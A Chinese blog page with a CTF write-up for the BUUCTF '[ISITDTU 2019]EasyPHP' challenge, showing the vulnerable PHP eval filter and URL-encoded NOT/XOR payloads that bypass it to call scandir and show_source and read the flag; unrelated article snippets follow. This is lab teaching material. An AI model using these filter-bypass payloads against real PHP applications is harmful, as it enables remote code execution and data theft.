当前位置：首页 > news >正文

可以做视频推广的网站有哪些/搜索引擎推广方案

news 文章来源：https://blog.csdn.net/2402_87039650/article/details/145424622 2025/3/19 20:52:43

可以做视频推广的网站有哪些,搜索引擎推广方案,简单h5,筹划电子商务网站建设进入靶场代码 <?php // 高亮显示当前 PHP 文件的源代码，通常用于调试或展示代码，方便用户查看代码逻辑 highlight_file(__FILE__);// 从 GET 请求中获取名为 _ 的参数值，并赋值给变量 $_ // 符号用于抑制可能出现的错误信息&#xff…

进入靶场

代码

<?php
// 高亮显示当前 PHP 文件的源代码，通常用于调试或展示代码，方便用户查看代码逻辑
highlight_file(__FILE__);// 从 GET 请求中获取名为 '_' 的参数值，并赋值给变量 $_
// @ 符号用于抑制可能出现的错误信息，若未传递该参数则不会抛出警告
$_ = @$_GET['_'];// 使用正则表达式检查变量 $_ 中是否包含特定字符
// 这些字符包括空字符（\x00）、数字（0 - 9）、单引号（'）、双引号（"）、反引号（`）、美元符号（$）、
// 与符号（&）、逗号（,）、点号（.）、竖线（|）、左方括号（[）、左花括号（{）以及字母 defgops 等
// 若包含这些字符，则终止脚本执行并输出提示信息
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )die('rosé will not do it');// 对变量 $_ 进行小写转换，然后使用 count_chars 函数统计其中不同字符的数量
// 0x3 是 count_chars 函数的模式参数，表示返回一个数组，数组的键是字符的 ASCII 码，值是该字符出现的次数
// 接着获取该数组的长度，即不同字符的数量
// 如果不同字符的数量超过 13（0xd 是十六进制的 13），则终止脚本执行并输出提示信息
if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )die('you are so close, omg');// 如果上述两个条件都不满足，则将变量 $_ 作为 PHP 代码进行执行
// 这种做法存在严重的安全风险，因为用户可以通过 GET 请求注入恶意代码
eval($_);
?>

总结：绕过正则匹配

字符数量不超过13

1，取反

phpinfo() 是 PHP 里一个十分实用的内置函数，它的主要作用是输出当前 PHP 环境的详细配置信息。

<?php
print(urlencode(~'phpinfo'));
?>

%8F%97%8F%96%91%99%90

/?_=(~%8F%97%8F%96%91%99%90)();

2，分析禁用函数

看看怎么使用没有被禁止的函数读取目录

<?php
echo(urlencode(~'print_r'));
echo nl2br("\n");
echo(urlencode(~'scandir'));
echo nl2br("\n");
echo(urlencode(~'.'));
?>

再测测长度

<?php
print(strlen(count_chars(strtolower('(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF)((%D1)^(%FF)));'), 0x3)));
?>

超了

使用pscadi来代替ntr

((%8f%8d%96%96%8b%a0%8d)^(%ff%ff%ff%ff%ff%ff%ff)^(%ff%ff%ff%8c%ff%ff%ff)^(%ff%ff%ff%8b%ff%ff%ff))(((%8c%9c%9c%96%8c%96%8d)^(%ff%ff%ff%ff%ff%ff%ff)^(%ff%ff%8f%8c%9c%ff%ff)^(%ff%ff%8d%8b%8b%ff%ff))(%d1^%ff));

直接读不了，肯定超长度，end()获得数组的最后一个值

show_source(end(scandir('.')))

((%8D%8D%8D%8D%8D%8D%9E%8D)^(%9A%8D%8D%8D%8D%8D%9B%8D)^(%9A%9A%9E%9B%99%96%96%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%8D%9E%8D)^(%8D%99%8D)^(%9A%96%9B)^(%FF%FF%FF))(((%8D%9E%8D%9E%8D%8D%8D)^(%9A%9B%8D%99%8D%8D%9A)^(%9B%99%9E%96%9B%96%9A)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));

flag{664629c2-9083-4685-800a-f6ccbc5d0608}

98，【6】 buuctf web [ISITDTU 2019]EasyPHP

进入靶场代码 <?php // 高亮显示当前 PHP 文件的源代码，通常用于调试或展示代码，方便用户查看代码逻辑 highlight_file(__FILE__);// 从 GET 请求中获取名为 _ 的参数值，并赋值给变量 $_ // 符号用于抑制可能出现的错误信息&#xff…...

编程日记 2025/2/5 1:14:01

Kamailio、MySQL、Redis、Gin后端、Vue.js前端等基于容器化部署

基于容器化的部署方案，通常会将每个核心服务（如Kamailio、MySQL、Redis、Gin后端、Vue.js前端等）独立运行在不同的容器中，通过Docker或Kubernetes统一管理。以下是具体实现方式和关键原因： 1. 容器化部署的核心思路每…...

编程日记 2025/2/5 1:06:55

知识管理系统助力企业信息共享与创新思维的全面提升研究

内容概要知识管理系统的引入极大地改变了企业内部的信息流程与创新机制。通过有效整合与管理组织内的知识资源，这些系统不仅降低了信息孤岛的现象，还提升了员工之间的协作能力。企业在信息共享方面，通过知识管理系统构建了一个透明、高效的…...

编程日记 2025/2/5 1:05:54

Leetcode 131 分割回文串(纯DFS)

131. 分割回文串https://leetcode.cn/problems/palindrome-partitioning/https://leetcode.cn/problems/palindrome-partitioning/ 给你一个字符串 s，请你将 s 分割成一些子串，使每个子串都是回文串。返回 s 所有可能的分割方案。示例 1&#xff1a…...

编程日记 2025/2/5 1:03:52

结构体DMA串口接收比特错位

发送： 显示： uint16_t接收时候会比特错位。...

编程日记 2025/2/5 1:01:48

用FormLinker实现自动调整数据格式，批量导入微软表单

每天早上打开Excel时，你是否也经历过这样的噩梦？ 熬夜调整好的问卷格式，导入微软表单后全乱套客户发来的PDF反馈表，手动录入3小时才完成10% 200道题库要转为在线测试，复制粘贴到手指抽筋微软官方数据显示&#xf…...

编程日记 2025/2/5 0:59:46

技术架构师成长路线（2025版）

目录通用知识计算机原理（1 - 2 个月） 数据结构（2 - 3 个月） 网络编程（1 - 2 个月） 软件工程（1 个月） 基础知识 Java 编程语言基础（2 - 3 个月） JVM&…...

编程日记 2025/2/5 0:55:42

独立开发者的技术栈

文章目录设计IDE&工具链前端后端移动端用户管理支付数据部署运维AI工具箱🔥避坑指南参考链接一个人就是一家公司的时代已经到来设计 FigmaPixso是国产设计工具，可作为Figma的替代版使用Sketch IDE&工具链 VscodeESLint & Prettier: &a…...

编程日记 2025/2/5 0:48:28

wordpress每隔24小时随机推荐一个指定分类下的置顶内容。

在WordPress中实现每隔24小时随机推荐一个指定分类下的置顶内容，可以通过以下步骤实现： 1. 创建自定义函数在主题的functions.php文件中添加以下代码，用于创建一个定时任务，每隔24小时随机选择一个置顶文章并存储到选项中&…...

编程日记 2025/2/5 0:44:23

Android13源码下载和编译过程详解

前言作为Android开发者人人都应该有一份自己Android源码,这样我们就可以随时对自己有疑惑的地方通过亲手调试来加强理解一源码下载 1.1 配置要求官方推荐配置请参考：AOSP使用入门文档，重点有如下几项： 1.1.1 硬件配置要求至少需要…...

编程日记 2025/2/5 0:42:20

C++底层学习预备：模板初阶

文章目录 1.编程范式2.函数模板2.1 函数模板概念2.2 函数模板原理2.3 函数模板实例化2.3.1 隐式实例化2.3.2 显式实例化 2.4 模板参数的匹配原则 3.类模板希望读者们多多三连支持小编会继续更新你们的鼓励就是我前进的动力！ 进入STL库学习之前我们要先了解有关模板的…...

编程日记 2025/2/5 0:40:19

使用mybatisPlus插件生成代码步骤及注意事项

使用mybatisPlus插件可以很方便的生成与数据库对应的PO对象，以及对应的controller、service、ImplService、mapper代码，生成这种代码的方式有很多，包括mybatis-plus提供的代码生成器，以及idea提供的代码生成器，无论哪一…...

编程日记 2025/2/5 0:37:16

扩散模型（二）

相关阅读：扩散模型（一） Parameterization of L t L_t Lt for Training Loss 回想一下，我们需要训练一个神经网络来近似反向扩散过程中的条件概率分布，即, p θ ( x t − 1 ∣ x t ) N ( x t − 1 ; μ θ ( x t…...

编程日记 2025/2/5 0:32:10

java异常处理——try catch finally

单个异常处理 1.当try里的代码发生了catch里指定类型的异常之后，才会执行catch里的代码，程序正常执行到结尾 2.如果try里的代码发生了非catch指定类型的异常，则会强制停止程序，报错 3.finally修饰的代码一定会执行，除…...

编程日记 2025/2/5 0:31:08

新月军事战略分析系统使用手册

新月人物传记： 人物传记之新月篇-CSDN博客相关故事链接：星际智慧农业系统（SAS），智慧农业的未来篇章-CSDN博客 “新月智能武器系统”CIWS，开启智能武器的新纪元-CSDN博客 “新月之智”智能战术头盔系统&…...

编程日记 2025/2/5 0:30:07

Docker Hub 镜像 Pull 失败的解决方案

目录引言一、问题二、原因三、解决方法四、参考文献引言在云原生技术火热的当下，Docker可谓是其基础，由于其简单以及方便性，让开发人员不必再为环境配置问题而伤脑筋，因为可将其看作一个虚拟机程序去理解。所以掌握好它可谓是…...

编程日记 2025/2/5 0:28:04

SQL进阶实战技巧：如何构建用户行为转移概率矩阵，深入洞察会话内活动流转？

目录 1 场景描述 1.1 用户行为转移概率矩阵概念 1.2 用户行为转移概率矩阵构建方法（1）数据收集...

编程日记 2025/2/5 0:27:03

DeepSeek辅助学术写作关键词选取

关键词关键词主要从论文标题、摘要及正文中提炼出来，需要准确反映论文的核心主题和专业领域。关键词的选择不仅有助于标引人员进行主题词的选取、数据库的建立以及文献的检索，而且也便于读者高效检索和引用相关学术成果，从而促进学术交流的…...

编程日记 2025/2/5 0:25:00

后盾人JS -- 原型

没有原型的对象也有没有原型的对象 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>Document<…...

编程日记 2025/2/5 0:23:59

优选算法的灵动之章：双指针专题（一）

个人主页：手握风云专栏：算法目录一、双指针算法思想二、算法题精讲 2.1. 查找总价格为目标值的两个商品 2.2. 盛最多水的容器编辑 2.3. 移动零 2.4. 有效的三角形个数一、双指针算法思想双指针算法主要用于处理数组、链表等线性数据结构…...

编程日记 2025/2/5 0:19:55

BUUCTF Pwn axb_2019_brop64 题解

这题是BROP 所以不下文件先nc一下看看： 先要找到栈溢出长度： from pwn import * import timedef getsize():i 1while True:try:p remote("node5.buuoj.cn", 29367)p.sendafter("Please tell me:", ba * i)time.sleep(0.1)data …...

编程日记 2025/2/5 0:18:54

85.[1] 攻防世界 WEB easyphp

进入靶场属于代码审计 <?php // 高亮显示当前 PHP 文件的源代码，常用于调试或展示代码 highlight_file(__FILE__);// 初始化两个标志变量，用于后续条件判断 $key1 0; $key2 0;// 从 GET 请求中获取参数 a 和 b $a $_GET[a]; $b $_GET[b];// 检…...

编程日记 2025/2/5 0:17:53

动态规划学习

在进行算法题练习和一些题目中发现关于动态规划的内容较多，觉得有必要系统的学习和练习一下于是参照bilbilUP主英雄哪里出来的动态规划50题和LeetKoke网站进行学习和练习一概述动态规划是一个有限状态自动机可以抽象为一个有向无环图有起始节点终止节点 …...

编程日记 2025/2/5 0:16:51

数据结构【链栈】

基于 C 实现链表栈：原理、代码与应用一、引言栈就是一个容器，可以当场一个盒子，只能一个一个拿，一个一个放，而且是从上面放入。有序顺序栈操作比较容易【会了链栈之后顺序栈自然明白】，所以我们这里只…...

编程日记 2025/2/5 0:15:50

软件测试02----用例设计方法

今天目标 1.能对穷举场景设计测试点 2.能对限定边界规则设计测试点 3.能对多条件依赖关系进行设计测试点 4.能对项目业务进行设计测试点一、解决穷举场景重点：使用等价类划分法 1.1等价类划分法重点：有效等价和单个无效等价各取1个即可。步骤&#…...

编程日记 2025/2/5 0:13:48

编程AI深度实战：给vim装上AI

系列文章： 编程AI深度实战：私有模型deep seek r1，必会ollama-CSDN博客编程AI深度实战：自己的AI，必会LangChain-CSDN博客编程AI深度实战：给vim装上AI-CSDN博客编程AI深度实战：火的编程AI&…...

编程日记 2025/2/5 0:12:47

《DeepSeek R1：大模型最简安装秘籍》

DeepSeek R1：AI 大模型界的新起之秀在人工智能的璀璨星空中，大模型如繁星般闪耀，而 DeepSeek R1 无疑是其中一颗冉冉升起的新星，自问世以来便吸引了全球的目光，在人工智能领域占据了重要的一席之地。从性能表现上看…...

编程日记 2025/2/5 0:10:45

物业管理平台系统为社区管理带来数字化转型与服务创新新机遇

内容概要物业管理平台系统是数字化转型的利器，为社区管理带来了许多新机遇。想象一下，传统社区物业管理中繁琐的流程和低效的沟通如何被这种智能系统所替代。通过集成在线收费功能，我们不仅提高了费用收取的准确性，还减少了业主…...

编程日记 2025/2/5 0:09:43

红黑树的封装

一、封装思路在 STL 中 map set 的底层就是封装了一棵红黑树。其中连接红黑树和容器的是迭代器，map set 暴露出的接口都不是自己写的，而是红黑树写的，外部接口封装红黑树接口。所以写出红黑树为 map set 写的接口，再在上层的…...

编程日记 2025/2/5 0:04:38

25.2.3 【洛谷】作为栈的复习不错（学习记录）

今天学习的东西不算多，放了一个星期假，感觉不少东西都没那么清楚，得复习一下才行。今天搞个栈题写，把栈复习一下，明天进入正轨，边复习边学习新东西，应该会有二叉树的学习等等... 【洛谷】P1449 …...

编程日记 2025/2/5 0:03:37

相关文章：